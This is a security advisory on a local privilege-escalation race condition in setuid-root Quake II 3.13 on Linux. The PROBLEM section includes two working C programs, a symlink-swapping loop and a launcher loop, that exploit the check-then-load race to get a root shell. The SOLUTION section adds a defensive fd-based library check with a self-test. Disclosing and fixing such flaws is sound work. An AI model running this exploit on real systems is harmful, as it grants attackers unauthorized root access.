COMMAND

    Quake II 3.13

SYSTEMS AFFECTED

    Linux (at least)

PROBLEM

    'kevingeo' found the following.  Everyone who followed the
    installation instructions and made Quake2 setuid root is
    vulnerable.  In version 3.13, Quake2 tries to protect itself by
    checking the permissions of a library before loading it.  This
    just introduces a race condition between the check and the load.
    Simply find a file that is owned by root and has 0700 permissions,
    call ref_root.so ref_root.real.so, run e.c
    (./e /usr/games/quake2/ref_soft.so &, for example) in background,
    and then run f.c.  You'll have a root shell after a few minutes.

    e.c:
    ====

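    #include <unistd.h>

    /* Repeatedly repoints ref_root.so between argv[1] and ref_root.real.so. */
    int main(int argc, char **argv) {
        if (argc < 2)
            return 1;
        while (1) {
            unlink("ref_root.so");
            symlink(argv[1], "ref_root.so");
            unlink("ref_root.so");
            symlink("ref_root.real.so", "ref_root.so");
        }
    }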

    f.c:
    ====

    #include <stdlib.h>

    /* Launches quake2 in a loop with vid_ref set to root. */
    int main(void) {
        while (1) {
            system("/usr/games/quake/quake2 +set vid_ref root");
        }
    }

SOLUTION

    Remove the setuid bit from quake:

        chmod u-s /usr/games/quake/quake2
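
    The race under PROBLEM exists because the permission check and the
    load each resolve the library path separately.  The following is an
    added example, not code from the advisory or from Quake2, of a check
    bound to an open file descriptor instead of a path.  The names
    open_trusted_library and self_check and the temporary file names are
    assumptions made for the illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (added example). Returns an open fd for a library that
 * is a regular file owned by `owner` and not writable by group/other, else -1.
 * A stat(path) followed by a load of the same path resolves the name twice,
 * so the link can be repointed in between; here the name is resolved once
 * and every check is made on the object that was actually opened. */
int open_trusted_library(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC); /* symlink -> ELOOP */
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 ||
        !S_ISREG(st.st_mode) ||
        st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd; /* load from this fd; never resolve `path` a second time */
}

/* Runs the helper on constructed files in a fresh temp directory.
 * bit 0: plain file accepted, bit 1: symlink rejected, bit 2: 0666 rejected. */
int self_check(void)
{
    char dir[] = "/tmp/libchk.XXXXXX", file[64], lnk[64];
    int result = 0, fd;
    if (!mkdtemp(dir)) return -1;
    snprintf(file, sizeof file, "%s/ref_demo.so", dir);
    snprintf(lnk, sizeof lnk, "%s/ref_link.so", dir);
    if ((fd = open(file, O_CREAT | O_WRONLY, 0644)) < 0) return -1;
    close(fd);
    if (symlink(file, lnk) != 0) return -1;
    if ((fd = open_trusted_library(file, geteuid())) >= 0) { result |= 1; close(fd); }
    if (open_trusted_library(lnk, geteuid()) < 0) result |= 2;
    chmod(file, 0666);
    if (open_trusted_library(file, geteuid()) < 0) result |= 4;
    unlink(lnk); unlink(file); rmdir(dir);
    return result;
}

int main(void) { return self_check() == 7 ? 0 : 1; }
```

    O_NOFOLLOW covers only the final path component, so the directories
    leading to the library must also be writable only by the trusted
    owner.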